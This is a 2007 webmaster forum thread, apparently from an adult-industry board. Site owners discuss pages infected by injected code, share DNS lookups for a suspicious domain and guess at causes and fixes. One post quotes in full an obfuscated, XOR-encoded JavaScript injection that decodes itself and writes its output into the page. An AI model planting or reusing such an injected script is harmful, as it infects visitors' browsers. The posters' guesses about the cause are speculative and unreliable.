yahoo-xxx-girls.com Confirmed User Join Date: Jul 2006 Location: Canada Posts: 3,143	--------------------------------------------------------- http://softspydelete.com softspydelete.com. NS 3600 ns2.trdns.biz. softspydelete.com. NS 3600 ns1.trdns.biz. softspydelete.com. A 3600 88.255.90.253 ---------------- Searching for ns1.trdns.biz. A record at B.ROOT-SERVERS.NET. [192.228.79.201] ...took 156 ms Searching for ns1.trdns.biz. A record at A.GTLD.biz. [209.173.53.162] ...took 93 ms Searching for ns1.trdns.biz. A record at NS2.trdns.biz. [88.255.90.252] ...took 120 ms A record found: 88.255.90.251 Domain Type TTL Answer ns1.trdns.biz. A 3600 88.255.90.251 ---------------- ---------------- Searching for ns1.trdns.biz. A record at E.ROOT-SERVERS.NET. [192.203.230.10] ...took 177 ms Searching for ns1.trdns.biz. A record at H.GTLD.biz. [199.7.77.126] ...took 10 ms Searching for ns1.trdns.biz. A record at ns1.trdns.biz. [88.255.90.251] ...took 120 ms A record found: 88.255.90.251 Domain Type TTL Answer ns1.trdns.biz. A 3600 88.255.90.251 ---------------- __________________ sig too big

11-21-2007, 10:10 AM	#17
yahoo-xxx-girls.com Confirmed User Join Date: Jul 2006 Location: Canada Posts: 3,143	Spudman how exactly did this code get onto webair servers to begin with ? . __________________ sig too big

11-21-2007, 10:59 AM	#20
yahoo-xxx-girls.com Confirmed User Join Date: Jul 2006 Location: Canada Posts: 3,143	Perhaps someone attached a misc code to a image file? If you run a virus scanner on your server it might be a good idea... Later, __________________ sig too big

11-21-2007, 05:23 PM	#21
RegUser Confirmed User Join Date: Nov 2004 Posts: 1,472	I remember a similar code infecting tonnes of sites out there. It reinfects html pages within days if cleaned. I was under the impression that it happens because of a vulnerability with windows virtual machine but am not sure how to prevent it. Does any one know what causes this and how to fix it.....keep in mind that it propgates via internet. <script language="JavaScript">e = '0x00' + '56';str1 = "%ED%B5%BE%A3%C9%A4%A5%AE%BD%B2%EA%F7%A3%BE%A4 %BE%B7%BE%BD%BE%A5%AE%EF%B1%BE%B5%B5%B2%BB%F7%EB%E D%BE%B3%A7%B6%BA%B2%C9%A4%A7%B4%EA%F7%B1%A5%A5%B9% EF%F8%F8%A7%BE%BC%B8%B4%BB%A5%FB%BE%BB%B3%B8%F8%BD %B5%F8%B0%A7%B2%AE%F8%F7%C9%A0%BE%B5%A5%B1%EA%E6%C 9%B1%B2%BE%B0%B1%A5%EA%E6%EB%ED%F8%BE%B3%A7%B6%BA% B2%EB%ED%F8%B5%BE%A3%EB";str=tmp='';for(i=0;i<str1 .length;i+=3){tmp = unescape(str1.slice(i,i+3));str=str+String.fromCha rCode((tmp.charCodeAt(0)^e)-127);}document.write(str);</script>

11-21-2007, 05:46 PM	#22
AlienQ - BANNED FOR LIFE best designer on GFY Join Date: Mar 2003 Location: IALIEN.COM - High Definition Video and Photographic Productions -ICQ 78943384 Posts: 30,307	I had the same problem for a while it isusually inserted via a database on your own server. Secure the Data sources or remove unused ones, clear the index.html. I worked with SplitInfinity to solve my problem hit up your host and check with them to get it flushed. __________________ NAKED HOSTING FTW!11 I'm On The INSANE PLAN $9.95/mo! \| The Alien Blog Adult News Worth Reading Updated Daily \| Content For Sale! 641 PICS 216 MINUTES OF VIDEO $350.00 \|ICQ: 78943384 \|

11-21-2007, 05:51 PM	#23
minusonebit So Fucking Banned Join Date: Feb 2006 Location: [email protected] Posts: 7,391	Goddamn that is sneaky.

11-21-2007, 06:11 PM	#24
madfuck Registered User Join Date: Oct 2004 Posts: 2,032	idk, hummm i have NO idea???? good question

11-22-2007, 04:58 PM	#25
RegUser Confirmed User Join Date: Nov 2004 Posts: 1,472	i think it is an iframe that injects the code and resides as a .js file on the server.